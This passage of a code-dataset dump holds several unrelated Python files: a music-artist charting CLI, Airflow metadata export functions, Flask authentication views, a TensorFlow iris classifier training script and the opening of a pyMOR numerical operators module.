LIMIT 10\", (country5,))\n data5 = cur.fetchall()\n str(data5)\n \n df1 = pd.DataFrame([[ij for ij in i] for i in data1])\n df1.rename(columns={0: 'Name', 1: 'Listeners', 2: 'Country'}, inplace=True)\n \n df2 = pd.DataFrame([[ij for ij in i] for i in data2])\n df2.rename(columns={0: 'Name', 1: 'Listeners', 2: 'Country'}, inplace=True)\n \n df3 = pd.DataFrame([[ij for ij in i] for i in data3])\n df3.rename(columns={0: 'Name', 1: 'Listeners', 2: 'Country'}, inplace=True)\n \n df4 = pd.DataFrame([[ij for ij in i] for i in data4])\n df4.rename(columns={0: 'Name', 1: 'Listeners', 2: 'Country'}, inplace=True)\n \n df5 = pd.DataFrame([[ij for ij in i] for i in data5])\n df5.rename(columns={0: 'Name', 1: 'Listeners', 2: 'Country'}, inplace=True)\n \n frames = [df1, df2, df3, df4, df5]\n results = pd.concat(frames)\n rdf = pd.DataFrame(results['Name'].value_counts(ascending=False))\n newrdf = rdf[:5]\n fig = go.Figure(data=[go.Pie(labels=newrdf.index, values=newrdf['Name'])])\n fig.show()\n\n#user interface\nif __name__ == '__main__':\n command = input('Welcome! Enter a command (or help for options): ')\n\n while command != 'exit':\n if command.lower() == 'help':\n print(' ')\n print('This is a list of valid commands: ')\n print('----------------------------------------------------')\n print(' ')\n print('- topartists ')\n print('description: creates a bar graph for the top 10 ')\n print(' artists in a country')\n print('parameters: takes in one country name from the ISO ')\n print(' 3166-1 list. Except USA not available')\n print(' Ex: topartists Thailand')\n print(' ')\n print('- top5pi ')\n print('description: creates a pie chart of the top 5 most ')\n print(' popular artists for 5 countries ')\n print(' that are searched')\n print('parameters: enter 5 different country names from ')\n print(' the ISO 3166-1 list with spaces ')\n print(' inbetween. ')\n print(' Ex: top5pi Nepal Spain England ... ')\n print(' ')\n print('- list')\n print('description: opens up ISO 3166-1 list for reference ')\n print('parameters: none')\n print(' ')\n print('- exit')\n print('description: exits the program')\n print('parameters: none')\n print(' ')\n elif command[:10].lower() == 'topartists':\n coun = str(command[11:].capitalize())\n get_top_country_artists(coun)\n make_artist_table()\n populate_json()\n country_bar_plot(coun)\n elif command[:6].lower() == 'top5pi':\n coun_l = str(command[7:]).split()\n compare_countries(coun_l[0].capitalize(), coun_l[1].capitalize(), coun_l[2].capitalize(), coun_l[3].capitalize(), coun_l[4].capitalize())\n elif command[:4].lower() == 'list':\n print('Launching ' + 'https://en.wikipedia.org/wiki/ISO_3166-1' + ' for you to learn some more! ')\n webbrowser.open('https://en.wikipedia.org/wiki/ISO_3166-1', new = 2)\n else:\n print('INVALID COMMAND! >:( ')\n command = input('Enter a command (or help for options): ')\n\n print('Thank you for using the program! 
Good Bye :) ')\n\n \n","sub_path":"final-project/final.py","file_name":"final.py","file_ext":"py","file_size_in_byte":10001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"365539499","text":"import logging\n\nfrom dbnd._core.utils.timezone import utcnow\nfrom dbnd_airflow_export.dag_operations import get_dags, load_dags_models\nfrom dbnd_airflow_export.datetime_utils import pendulum_max_dt\nfrom dbnd_airflow_export.plugin_old.db_queries import (\n get_completed_task_instances_and_dag_runs,\n get_dag_runs_within_time_window,\n get_dag_runs_without_end_date,\n get_incomplete_task_instances_from_completed_dag_runs,\n get_task_instances_without_end_date,\n)\nfrom dbnd_airflow_export.plugin_old.metrics import measure_time\nfrom dbnd_airflow_export.plugin_old.model import ExportData\n\n\ndef get_dags_list_only(session, dagbag, dag_ids):\n \"\"\"\n This function returns all dags from Airflow but in their raw form - No tasks or source code are attached.\n Please do not use it in cases where either tasks or source code are required.\n \"\"\"\n load_dags_models(session)\n dags_list = get_dags(\n dagbag=dagbag, include_task_args=False, dag_ids=dag_ids, raw_data_only=True\n )\n ed = ExportData(\n task_instances=[], dag_runs=[], dags=dags_list, since=str(utcnow()),\n )\n\n return ed\n\n\n@measure_time\ndef get_complete_data(\n since,\n dag_ids,\n dagbag,\n quantity,\n include_logs,\n include_task_args,\n include_xcom,\n session,\n):\n \"\"\"\n This function returns the following data:\n 1. The first task instances that ended after since (limited by quantity). Also get their dag runs.\n 2. Dag runs that don't have task instances, but whose end_date is after since and before end_date of the most\n recent of the task instances.\n 3. All Dags of the Dag runs that we found in steps 1 and 2\n \"\"\"\n load_dags_models(session)\n\n logging.info(\"Trying to query completed task instances and dagruns from %s\" % since)\n\n task_instances, dag_runs = get_completed_task_instances_and_dag_runs(\n since, dag_ids, quantity, dagbag, include_logs, include_xcom, session\n )\n logging.info(\"%d task instances were found.\" % len(task_instances))\n\n task_end_dates = [\n task.end_date for task in task_instances if task.end_date is not None\n ]\n if not task_end_dates or not quantity or len(task_instances) < quantity:\n dag_run_end_date = pendulum_max_dt\n else:\n dag_run_end_date = max(task_end_dates)\n\n dag_runs |= get_dag_runs_within_time_window(\n since, dag_run_end_date, dag_ids, quantity, session\n )\n logging.info(\"%d dag runs were found.\" % len(dag_runs))\n\n if not dag_ids:\n dag_ids = set(dag_run.dag_id for dag_run in dag_runs)\n\n dags_list = get_dags(\n dagbag=dagbag,\n include_task_args=include_task_args,\n dag_ids=dag_ids,\n raw_data_only=False,\n )\n\n logging.info(\n \"Returning {} task instances, {} dag runs, {} dags\".format(\n len(task_instances), len(dag_runs), len(dags_list)\n )\n )\n\n ed = ExportData(\n task_instances=task_instances, dag_runs=dag_runs, dags=dags_list, since=since,\n )\n\n return ed\n\n\n@measure_time\ndef get_incomplete_data_type_1(\n since, dag_ids, dagbag, max_quantity, include_task_args, offset, session\n):\n \"\"\"\n This function returns the following data:\n 1. Task instances with end_date=None from dag runs that finished running (their end_date is not None).\n It brings only the first dag runs (limited by max_quantity) that ended after since.\n 2. 
All Dags of the Dag runs that we found in step 1\n \"\"\"\n load_dags_models(session)\n\n logging.info(\n \"Trying to query incomplete task instances from complete dagruns from %s\"\n % since\n )\n\n task_instances, dag_runs = get_incomplete_task_instances_from_completed_dag_runs(\n since, dag_ids, dagbag, max_quantity, offset, session\n )\n\n if not dag_ids:\n dag_ids = set(dag_run.dag_id for dag_run in dag_runs)\n\n dags_list = get_dags(\n dagbag=dagbag,\n include_task_args=include_task_args,\n dag_ids=dag_ids,\n raw_data_only=False,\n )\n\n logging.info(\n \"Returning {} task instances, {} dag runs, {} dags\".format(\n len(task_instances), len(dag_runs), len(dags_list)\n )\n )\n\n ed = ExportData(\n task_instances=task_instances, dag_runs=dag_runs, dags=dags_list, since=since,\n )\n\n return ed\n\n\n@measure_time\ndef get_incomplete_data_type_2(\n since, dag_ids, dagbag, quantity, include_task_args, incomplete_offset, session\n):\n \"\"\"\n This function returns the following data:\n 1. Task instances with end_date=None from dag runs that are running (their end_date=None). Also their dag runs.\n 2. All Dags of the Dag runs that we found in step 1\n Important: since pagination is used, the same parameters can return different results at different times.\n \"\"\"\n load_dags_models(session)\n\n logging.info(\n \"Trying to query incomplete task instances and dagruns from %s\" % since\n )\n\n task_instances, dag_runs = get_task_instances_without_end_date(\n since=since,\n dag_ids=dag_ids,\n dagbag=dagbag,\n session=session,\n incomplete_offset=incomplete_offset,\n page_size=quantity,\n )\n logging.info(\n \"Found {} task instances with no end_date from {} dag runs\".format(\n len(task_instances), len(dag_runs)\n )\n )\n\n dag_runs_without_date = get_dag_runs_without_end_date(\n since=since,\n dag_ids=dag_ids,\n session=session,\n incomplete_offset=incomplete_offset,\n page_size=quantity,\n )\n logging.info(\"Found {} dag runs with no end_date\".format(len(dag_runs)))\n\n dag_runs |= dag_runs_without_date\n\n if not dag_ids:\n dag_ids = set(dag_run.dag_id for dag_run in dag_runs)\n\n dags_list = get_dags(\n dagbag=dagbag,\n include_task_args=include_task_args,\n dag_ids=dag_ids,\n raw_data_only=False,\n )\n\n logging.info(\n \"Returning {} task instances, {} dag runs, {} dags\".format(\n len(task_instances), len(dag_runs), len(dags_list)\n )\n )\n\n ed = ExportData(\n task_instances=task_instances, dag_runs=dag_runs, dags=dags_list, since=since,\n )\n\n return ed\n","sub_path":"plugins/dbnd-airflow-export/src/dbnd_airflow_export/plugin_old/logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":6166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"225809365","text":"from flask import render_template, redirect, request, url_for, flash\nfrom flask_login import login_user, login_required, logout_user\n\nfrom . import auth\nfrom .forms import LoginForm, RegisterForm\nfrom ..models import User, confirm_token\nfrom .. 
import db\n\n@auth.route(\"/login\", methods=[\"POST\",\"GET\"])\ndef login():\n form = LoginForm()\n if form.validate_on_submit():\n user = (User.query.filter(User.username.ilike(form.login.data)).first() or \n User.query.filter(User.email.ilike(form.login.data)).first())\n if user is not None and user.verify_password(form.password.data):\n login_user(user, form.remember_me.data)\n flash(\"Successfully logged in.\", \"success\")\n return redirect(request.args.get(\"next\") or url_for(\"home.home\"))\n flash(\"Invalid username or password\", \"error\")\n return render_template(\"login.html\", form=form)\n\n@auth.route(\"/logout\")\n@login_required\ndef logout():\n logout_user()\n flash(\"You have been logged out.\", \"success\")\n return redirect(url_for(\"home.home\"))\n\n@auth.route(\"/register\", methods=[\"POST\", \"GET\"])\ndef register():\n form = RegisterForm()\n if form.validate_on_submit():\n if User.query.filter(User.username.ilike(form.username.data)).first() is not None:\n flash(\"Username is already in use.\", \"error\")\n elif User.query.filter(User.email.ilike(form.email.data)).first() is not None:\n flash(\"Email is already in use.\", \"error\")\n else:\n new_user = User(email=form.email.data,\n first=form.first.data,\n last=form.last.data,\n username=form.username.data,\n password=form.password.data)\n\n db.session.add(new_user)\n db.session.commit()\n\n token = new_user.generate_confirmation_token()\n print(url_for(\"auth.confirm\", token=token))\n return redirect(request.args.get(\"next\") or url_for(\"home.home\"))\n return render_template(\"register.html\", form=form)\n\n@auth.route(\"/confirm/<token>\")\n@login_required\ndef confirm(token):\n error = False\n try:\n email = confirm_token(token)\n if email is None:\n error = True\n except:\n error = True\n if error:\n flash('The confirmation link is invalid or has expired.', 'error')\n return redirect(url_for(\"home.home\"))\n user = User.query.filter_by(email=email).first_or_404()\n if user.confirmed:\n flash(\"Account already confirmed. Please login.\", \"success\")\n else:\n user.confirmed = True\n db.session.add(user)\n db.session.commit()\n flash(\"You have confirmed your account. Thanks!\", \"success\")\n return redirect(url_for(\"home.home\"))\n\n","sub_path":"app/auth/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
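# The confirmation helpers used above (User.generate_confirmation_token and
# confirm_token from ..models) are not part of this record. A minimal sketch of
# what they are assumed to look like, built on itsdangerous; the secret key and
# max_age below are illustrative assumptions, not the original implementation:
from itsdangerous import URLSafeTimedSerializer, BadSignature, SignatureExpired

SECRET_KEY = "change-me"  # assumed to come from the Flask app config in the real code

def generate_confirmation_token(email):
    # Sign and timestamp the email address.
    return URLSafeTimedSerializer(SECRET_KEY).dumps(email)

def confirm_token(token, max_age=3600):
    # Return the email for a valid, fresh token, else None (matching the
    # `email is None` check in the confirm() view above).
    try:
        return URLSafeTimedSerializer(SECRET_KEY).loads(token, max_age=max_age)
    except (SignatureExpired, BadSignature):
        return None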
+{"seq_id":"524516351","text":"#Work around GPU out-of-memory issues by forcing CPU execution\r\nimport os\r\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"-1\"\r\n\r\n#Import the required modules\r\nimport tensorflow as tf\r\nfrom sklearn import datasets\r\nfrom matplotlib import pyplot as plt\r\nimport numpy as np\r\n\r\n#Load the data: input features and labels separately\r\nx_data = datasets.load_iris().data\r\ny_data = datasets.load_iris().target\r\n# print(x_data,y_data)\r\n\r\n#Shuffle the data: the original set is ordered, and leaving it ordered hurts accuracy\r\n#seed: an integer random seed; once set, the same random numbers are generated every run\r\nnp.random.seed(116) #use the same seed so input features and labels stay paired\r\nnp.random.shuffle(x_data)\r\nnp.random.seed(116)\r\nnp.random.shuffle(y_data)\r\ntf.random.set_seed(116)\r\n\r\n#Split the shuffled data into disjoint training and test sets (the last 30 samples form the test set)\r\nx_train = x_data[:-30]\r\ny_train = y_data[:-30]\r\nx_test = x_data[-30:]\r\ny_test = y_data[-30:]\r\n\r\n#Cast x to float32, otherwise the matrix multiplication below fails on a dtype mismatch\r\nx_train = tf.cast(x_train, tf.float32)\r\nx_test = tf.cast(x_test, tf.float32)\r\n# print(x_train,y_train)\r\n\r\n#from_tensor_slices pairs input features with labels and batches the dataset (batch=32 here)\r\ntrain_db = tf.data.Dataset.from_tensor_slices((x_train, y_train)).batch(32)\r\ntest_db = tf.data.Dataset.from_tensor_slices((x_test, y_test)).batch(32)\r\n\r\n#Create the network parameters: 4 input features -> 4 input nodes; 3 classes -> 3 output neurons\r\n#tf.Variable() marks the parameters as trainable\r\n#the seed makes the random init reproducible (in real training you would omit it)\r\n#Declare the network parameters\r\nw1 = tf.Variable(tf.random.truncated_normal([4,3], stddev=0.1, seed=1))\r\nb1 = tf.Variable(tf.random.truncated_normal([3], stddev=0.1, seed=1))\r\n\r\nlr = 0.2 #learning rate of 0.2\r\ntrain_loss_results = [] #record each epoch's loss here to plot the loss curve later\r\ntest_acc = [] #record each epoch's accuracy here to plot the accuracy curve later\r\nepoch = 500 #500 epochs (the data is fed 500 times)\r\nloss_all = 0 #each epoch has 4 steps; loss_all sums the loss over those steps, since the data is fed in batches\r\n\r\n#Training\r\nfor epoch in range(epoch): #dataset-level loop: one pass over the dataset per epoch\r\n for step, (x_train, y_train) in enumerate(train_db): #batch-level loop: one batch per step\r\n with tf.GradientTape() as tape: #the with block records gradient information\r\n y = tf.matmul(x_train, w1) + b1 #the network's multiply-accumulate\r\n y = tf.nn.softmax(y) #turn the output y into a probability distribution\r\n y_ = tf.one_hot(y_train, depth = 3) #one-hot encode the labels to simplify the loss\r\n loss = tf.reduce_mean(tf.square(y_ - y)) #mean-squared-error loss\r\n loss_all += loss.numpy() #accumulate the loss computed at each step\r\n #compute the gradients of the loss w.r.t. each parameter\r\n grads = tape.gradient(loss, [w1, b1])\r\n\r\n #gradient update: w1=w1-lr*w1_grad b=b-lr*b_grad\r\n w1.assign_sub(lr * grads[0]) #update w1 in place\r\n b1.assign_sub(lr * grads[1]) #update b in place\r\n\r\n #print the loss once per epoch\r\n print(\"Epoch:{},loss:{}\".format(epoch, loss_all/4))\r\n train_loss_results.append(loss_all/4) #record the loss averaged over the 4 steps\r\n loss_all = 0 #reset loss_all for the next epoch\r\n\r\n #Testing\r\n #total_correct = number of correct predictions, total_number = number of test samples; initialize both to 0\r\n total_correct, total_number = 0, 0\r\n for x_test, y_test in test_db:\r\n #evaluate with the updated parameters\r\n y = tf.matmul(x_test, w1) +b1\r\n y = tf.nn.softmax(y)\r\n pred = tf.argmax(y, axis=1) #index of the largest entry of y, i.e. the predicted class\r\n #cast pred to y_test's dtype\r\n pred = tf.cast(pred, dtype=y_test.dtype)\r\n #correct is 1 where the prediction matches, 0 otherwise (bool cast to int)\r\n correct = tf.cast(tf.equal(pred,y_test), dtype=tf.int32)\r\n #sum the correct predictions within the batch\r\n correct = tf.reduce_sum(correct)\r\n #accumulate the correct predictions across batches\r\n total_correct += int(correct)\r\n #total_number is the total test sample count, i.e. the row count of x_test (shape[0])\r\n total_number +=x_test.shape[0]\r\n #overall accuracy = total_correct / total_number\r\n acc = total_correct / total_number\r\n test_acc.append(acc)\r\n print(\"Test_acc:\", acc)\r\n print(\"-----------------\")\r\n\r\n#Plot the loss curve\r\nplt.title(\"Loss Function Curve\") #figure title\r\nplt.xlabel(\"Epoch\") #x-axis label\r\nplt.ylabel(\"Loss\") #y-axis label\r\nplt.plot(train_loss_results, label=\"$Loss$\")\r\nplt.legend() #draw the legend\r\nplt.show() #show the figure\r\n\r\n#Plot the accuracy curve\r\nplt.title(\"Acc Curve\")\r\nplt.xlabel(\"Epoch\")\r\nplt.ylabel(\"Acc\")\r\nplt.plot(test_acc, label=\"$Accuracy$\") #plot the test_acc values point by point and connect them; the legend label is Accuracy\r\nplt.legend()\r\nplt.show()","sub_path":"liris_CNN.py","file_name":"liris_CNN.py","file_ext":"py","file_size_in_byte":5205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
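# The liris_CNN.py script above hand-rolls softmax regression with tf.GradientTape;
# the same model can be cross-checked in a few lines of Keras. This is a sketch,
# not part of the original script: it uses sparse categorical cross-entropy where
# the script uses MSE on one-hot labels, and the validation split is an assumption.
import tensorflow as tf
from sklearn import datasets

x, y = datasets.load_iris(return_X_y=True)
model = tf.keras.Sequential([tf.keras.layers.Dense(3, activation="softmax", input_shape=(4,))])
model.compile(optimizer=tf.keras.optimizers.SGD(learning_rate=0.2),
              loss="sparse_categorical_crossentropy",
              metrics=["accuracy"])
model.fit(x, y, epochs=500, batch_size=32, validation_split=0.2, verbose=0)
print(model.evaluate(x, y, verbose=0))  # [loss, accuracy]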
+{"seq_id":"153817197","text":"# -*- coding: utf-8 -*-\n# This file is part of the pyMOR project (http://www.pymor.org).\n# Copyright Holders: Rene Milk, Stephan Rave, Felix Schindler\n# License: BSD 2-Clause License (http://opensource.org/licenses/BSD-2-Clause)\n\n'''This module provides some |NumPy| based |Operators| as well as base classes\nproviding some common functionality for the implementation of new |Operators|.\n\nThere are three |NumPy|-based |Operators| of interest:\n\n - |NumpyMatrixOperator| wraps a 2D |NumPy array| as a proper |Operator|.\n - |NumpyMatrixBasedOperator| should be used as base class for all |Operators|\n which assemble into a |NumpyMatrixOperator|.\n - |NumpyGenericOperator| wraps an arbitrary Python function between\n |NumPy arrays| as an |Operator|.\n\nIf you are developing new |Operators| not based on |NumPy arrays|, you should\nconsider deriving from :class:`OperatorBase`, :class:`AssemblableOperatorBase` or\n:class:`LincombOperatorBase`.\n'''\n\nfrom __future__ import absolute_import, division, print_function\n\nfrom collections import OrderedDict\nfrom itertools import izip\nfrom numbers import Number\n\nimport numpy as np\nfrom scipy.sparse import issparse\nfrom scipy.sparse.linalg import bicgstab, spsolve, spilu, LinearOperator\nfrom scipy.io import mmwrite, savemat\n\nfrom pymor import defaults\nfrom pymor.core import abstractmethod\nfrom pymor.core.exceptions import InversionError\nfrom pymor.la.interfaces import VectorArrayInterface\nfrom pymor.la.numpyvectorarray import NumpyVectorArray\nfrom pymor.operators.interfaces import OperatorInterface, LincombOperatorInterface\nfrom pymor.parameters import ParameterFunctionalInterface\n\ntry:\n import pyamg\n HAVE_PYAMG = True\nexcept ImportError:\n HAVE_PYAMG = False\n\n\nclass OperatorBase(OperatorInterface):\n '''Base class for |Operators| providing some default implementations.'''\n\n def apply2(self, V, U, pairwise, U_ind=None, V_ind=None, mu=None, product=None):\n mu = self.parse_parameter(mu)\n assert isinstance(V, VectorArrayInterface)\n assert isinstance(U, VectorArrayInterface)\n U_ind = None if U_ind is None else np.array(U_ind, copy=False, dtype=np.int, ndmin=1)\n V_ind = None if V_ind is None else np.array(V_ind, copy=False, dtype=np.int, ndmin=1)\n if pairwise:\n lu = len(U_ind) if U_ind is not None else len(U)\n lv = len(V_ind) if V_ind is not None else len(V)\n assert lu == lv\n AU = self.apply(U, ind=U_ind, mu=mu)\n if product is not None:\n AU = product.apply(AU)\n return V.dot(AU, ind=V_ind, pairwise=pairwise)\n\n def jacobian(self, U, mu=None):\n if self.linear:\n if self.parametric:\n if hasattr(self, 'assemble'):\n return self.assemble(mu)\n else:\n from pymor.operators.constructions import FixedParameterOperator\n return FixedParameterOperator(self, mu)\n else:\n assert self.check_parameter(mu)\n return self\n else:\n raise NotImplementedError\n\n 
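# apply2() above evaluates inner products of V against A(U); with the NumPy-based
# classes defined later in this module it reduces to a small dense product. A
# made-up example, a sketch rather than pyMOR test code:
import numpy as np

A = NumpyMatrixOperator(np.diag([1., 2.]))   # defined further down in this module
V = NumpyVectorArray(np.eye(2))
U = NumpyVectorArray(np.eye(2))
G = A.apply2(V, U, pairwise=False)           # G[i, j] = (V_i, A U_j)
# with identity bases, G reproduces the matrix of A itself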
@staticmethod\n def lincomb(operators, coefficients=None, num_coefficients=None, coefficients_name=None, name=None):\n return LincombOperator(operators, coefficients, num_coefficients, coefficients_name, name=None)\n\n def __add__(self, other):\n if isinstance(other, Number):\n assert other == 0.\n return self\n return self.lincomb([self, other], [1, 1])\n\n __radd__ = __add__\n\n def __mul__(self, other):\n assert isinstance(other, Number)\n return self.lincomb([self], [other])\n\n def __str__(self):\n return '{}: R^{} --> R^{} (parameter type: {}, class: {})'.format(\n self.name, self.dim_source, self.dim_range, self.parameter_type,\n self.__class__.__name__)\n\n def apply_inverse(self, U, ind=None, mu=None, options=None):\n raise InversionError('No inversion algorithm available.')\n\n def as_vector(self, mu=None):\n if not self.linear:\n raise TypeError('This nonlinear operator does not represent a vector or linear functional.')\n elif self.dim_source == 1 and self.type_source is NumpyVectorArray:\n return self.apply(NumpyVectorArray(1), mu=mu)\n elif self.dim_range == 1 and self.type_range is NumpyVectorArray:\n raise NotImplementedError\n else:\n raise TypeError('This operator does not represent a vector or linear functional.')\n\n def projected(self, source_basis, range_basis, product=None, name=None):\n name = name or '{}_projected'.format(self.name)\n if self.linear:\n if self.parametric:\n self.logger.warn('Using inefficient generic linear projection operator')\n # Since the bases are not immutable and we do not own them,\n # the ProjectedLinearOperator will have to create copies of them.\n return ProjectedLinearOperator(self, source_basis, range_basis, product, copy=True, name=name)\n else:\n # Here we do not need copies since the operator is immediately thrown away.\n return (ProjectedLinearOperator(self, source_basis, range_basis, product, copy=False, name=name)\n .assemble())\n else:\n self.logger.warn('Using inefficient generic projection operator')\n return ProjectedOperator(self, source_basis, range_basis, product, copy=True, name=name)\n\n\nclass AssemblableOperatorBase(OperatorBase):\n '''Base class for operators which have to be assembled.\n\n This class provides a thin wrapper around the\n :meth:`~pymor.operators.interfaces.OperatorInterface.apply`\n and :meth:`~pymor.operators.interfaces.OperatorInterface.as_vector` methods by\n calling these methods on the |Operator| which is returned\n by the :meth:`AssemblableOperatorBase._assemble` method the implementor has\n supplied. 
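# __add__/__mul__ above reduce Python arithmetic on operators to lincomb(); a small
# made-up example using NumpyMatrixOperator from further down in this module (note
# that only op * scalar is defined, there is no __rmul__, so write B * 2, not 2 * B):
import numpy as np

A = NumpyMatrixOperator(np.eye(2))
B = NumpyMatrixOperator(np.ones((2, 2)))
L = A + B * 2                    # the linear combination 1*A + 2*B
M = L.assemble()                 # sums the weighted matrices into a single operator
assert np.allclose(M._matrix, np.eye(2) + 2 * np.ones((2, 2)))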
The last assembled operator is remembered, so subsequent\n :meth:`~pymor.operators.interfaces.OperatorInterface.apply` calls\n for the same |Parameter| do not lead to a re-assembly of the operator.\n It is assumed that the assembled operator is no longer |Parameter|-dependent.\n\n Attributes\n ----------\n assembled\n In case the operator is not |Parameter|-dependent, `True` if the\n operator has already been assembled.\n '''\n\n _assembled = False\n\n @property\n def assembled(self):\n return self._assembled\n\n @abstractmethod\n def _assemble(self, mu=None):\n pass\n\n def assemble(self, mu=None):\n '''Assembles the operator for a given |Parameter|.\n\n Parameters\n ----------\n mu\n The |Parameter| for which to assemble the operator.\n\n Returns\n -------\n The assembled **parameter independent** |Operator|.\n '''\n if self._assembled:\n assert self.check_parameter(mu)\n return self._last_op\n elif self.parameter_type is None:\n assert self.check_parameter(mu)\n self._last_op = self._assemble()\n self._assembled = True\n return self._last_op\n else:\n mu_s = self.strip_parameter(mu)\n if mu_s == self._last_mu:\n return self._last_op\n else:\n self._last_mu = mu_s.copy()\n self._last_op = self._assemble(mu)\n return self._last_op\n\n def apply(self, U, ind=None, mu=None):\n if not self._assembled:\n return self.assemble(mu).apply(U, ind=ind)\n elif self._last_op is not self:\n return self._last_op.apply(U, ind=ind)\n else:\n raise NotImplementedError\n\n def as_vector(self, mu=None):\n if not self._assembled:\n return self.assemble(mu).as_vector()\n elif self._last_op is not self:\n return self._last_op.as_vector()\n else:\n return super(AssemblableOperatorBase, self).as_vector(self, mu)\n\n def apply_inverse(self, U, ind=None, mu=None, options=None):\n if self._assembled:\n return self._last_op.apply_inverse(U, ind=ind, options=options)\n else:\n return self.assemble(mu).apply_inverse(U, ind=ind, options=options)\n\n _last_mu = None\n _last_op = None\n\n\nclass LincombOperatorBase(OperatorBase, LincombOperatorInterface):\n '''Base class for |LincombOperators| providing some default implementations.\n\n Parameters\n ----------\n operators\n List of |Operators| whose linear combination is formed.\n coefficients\n `None` or a list of linear coefficients.\n num_coefficients\n If `coefficients` is `None`, the number of linear coefficients (starting\n at index 0) which are given by the |Parameter| component with name\n `'coefficients_name'`. 
The missing coefficients are set to `1`.\n coefficients_name\n If `coefficients` is `None`, the name of the |Parameter| component providing\n the linear coefficients.\n name\n Name of the operator.\n '''\n\n def __init__(self, operators, coefficients=None, num_coefficients=None, coefficients_name=None, name=None):\n assert coefficients is None or len(operators) == len(coefficients)\n assert len(operators) > 0\n assert all(isinstance(op, OperatorInterface) for op in operators)\n assert coefficients is None or all(isinstance(c, (ParameterFunctionalInterface, Number)) for c in coefficients)\n assert all(op.dim_source == operators[0].dim_source for op in operators[1:])\n assert all(op.dim_range == operators[0].dim_range for op in operators[1:])\n assert all(op.type_source == operators[0].type_source for op in operators[1:])\n assert all(op.type_range == operators[0].type_range for op in operators[1:])\n assert coefficients is None or num_coefficients is None\n assert coefficients is None or coefficients_name is None\n assert coefficients is not None or coefficients_name is not None\n assert coefficients_name is None or isinstance(coefficients_name, str)\n self.dim_source = operators[0].dim_source\n self.dim_range = operators[0].dim_range\n self.type_source = operators[0].type_source\n self.type_range = operators[0].type_range\n self.operators = operators\n self.coefficients = coefficients\n self.coefficients_name = coefficients_name\n self.linear = all(op.linear for op in operators)\n self.name = name\n if coefficients is None:\n self.num_coefficients = num_coefficients if num_coefficients is not None else len(operators)\n self.pad_coefficients = len(operators) - self.num_coefficients\n self.build_parameter_type({'coefficients': self.num_coefficients}, inherits=list(operators),\n global_names={'coefficients': coefficients_name})\n else:\n self.build_parameter_type(inherits=list(operators) +\n [f for f in coefficients if isinstance(f, ParameterFunctionalInterface)])\n\n def evaluate_coefficients(self, mu):\n mu = self.parse_parameter(mu)\n if self.coefficients is None:\n if self.pad_coefficients:\n return np.concatenate((self.local_parameter(mu)['coefficients'], np.ones(self.pad_coefficients)))\n else:\n return self.local_parameter(mu)['coefficients']\n\n else:\n return np.array([c.evaluate(mu) if hasattr(c, 'evaluate') else c for c in self.coefficients])\n\n def jacobian(self, U, mu=None):\n jacobians = [op.jacobian(U, mu) for op in self.operators]\n name = '{}_jacobian'.format(self.name)\n num_coefficients = getattr(self, 'num_coefficients', None)\n return type(jacobians[0]).lincomb(operators=jacobians, coefficients=self.coefficients,\n num_coefficients=num_coefficients,\n coefficients_name=self.coefficients_name, name=name)\n\n def as_vector(self, mu=None):\n coefficients = self.evaluate_coefficients(mu)\n vectors = [op.as_vector(mu) for op in self.operators]\n R = vectors[0]\n R.scal(coefficients[0])\n for c, v in izip(coefficients[1:], vectors[1:]):\n R.axpy(c, v)\n return R\n\n def projected(self, source_basis, range_basis, product=None, name=None):\n proj_operators = [op.projected(source_basis=source_basis, range_basis=range_basis, product=product)\n for op in self.operators]\n name = name or '{}_projected'.format(self.name)\n num_coefficients = getattr(self, 'num_coefficients', None)\n return type(proj_operators[0]).lincomb(operators=proj_operators, coefficients=self.coefficients,\n num_coefficients=num_coefficients,\n coefficients_name=self.coefficients_name, name=name)\n\n def 
projected_to_subbasis(self, dim_source=None, dim_range=None, name=None):\n '''See :meth:`NumpyMatrixOperator.projected_to_subbasis`.'''\n assert dim_source is None or dim_source <= self.dim_source\n assert dim_range is None or dim_range <= self.dim_range\n proj_operators = [op.projected_to_subbasis(dim_source=dim_source, dim_range=dim_range)\n for op in self.operators]\n name = name or '{}_projected_to_subbasis'.format(self.name)\n num_coefficients = getattr(self, 'num_coefficients', None)\n return type(proj_operators[0]).lincomb(operators=proj_operators, coefficients=self.coefficients,\n num_coefficients=num_coefficients,\n coefficients_name=self.coefficients_name, name=name)\n\n\nclass NumpyGenericOperator(OperatorBase):\n '''Wraps an arbitrary Python function between |NumPy arrays| as a proper\n |Operator|.\n\n Parameters\n ----------\n mapping\n The function to wrap. If `parameter_type` is `None`, the function is of\n the form `mapping(U)` and is expected to be vectorized. In particular::\n\n mapping(U).shape == U.shape[:-1] + (dim_range,).\n\n If `parameter_type` is not `None`, the function has to have the signature\n `mapping(U, mu)`.\n dim_source\n Dimension of the operator's source.\n dim_range\n Dimension of the operator's range.\n linear\n Set to `True` if the provided `mapping` is linear.\n parameter_type\n The |ParameterType| the mapping accepts.\n name\n Name of the operator.\n '''\n\n type_source = type_range = NumpyVectorArray\n\n def __init__(self, mapping, dim_source=1, dim_range=1, linear=False, parameter_type=None, name=None):\n self.dim_source = dim_source\n self.dim_range = dim_range\n self.name = name\n self._mapping = mapping\n self.linear = linear\n if parameter_type is not None:\n self.build_parameter_type(parameter_type, local_global=True)\n\n def apply(self, U, ind=None, mu=None):\n assert isinstance(U, NumpyVectorArray)\n assert U.dim == self.dim_source\n U_array = U._array[:U._len] if ind is None else U._array[ind]\n if self.parametric:\n mu = self.parse_parameter(mu)\n return NumpyVectorArray(self._mapping(U_array, mu=mu), copy=False)\n else:\n assert self.check_parameter(mu)\n return NumpyVectorArray(self._mapping(U_array), copy=False)\n\n\nclass NumpyMatrixBasedOperator(AssemblableOperatorBase):\n '''Base class for operators which assemble into a |NumpyMatrixOperator|.\n\n Attributes\n ----------\n sparse\n `True` if the operator assembles into a sparse matrix, `False` if the\n operator assembles into a dense matrix, `None` if unknown.\n '''\n\n linear = True\n type_source = type_range = NumpyVectorArray\n sparse = None\n\n @staticmethod\n def lincomb(operators, coefficients=None, num_coefficients=None, coefficients_name=None, name=None):\n if not all(isinstance(op, NumpyMatrixBasedOperator) for 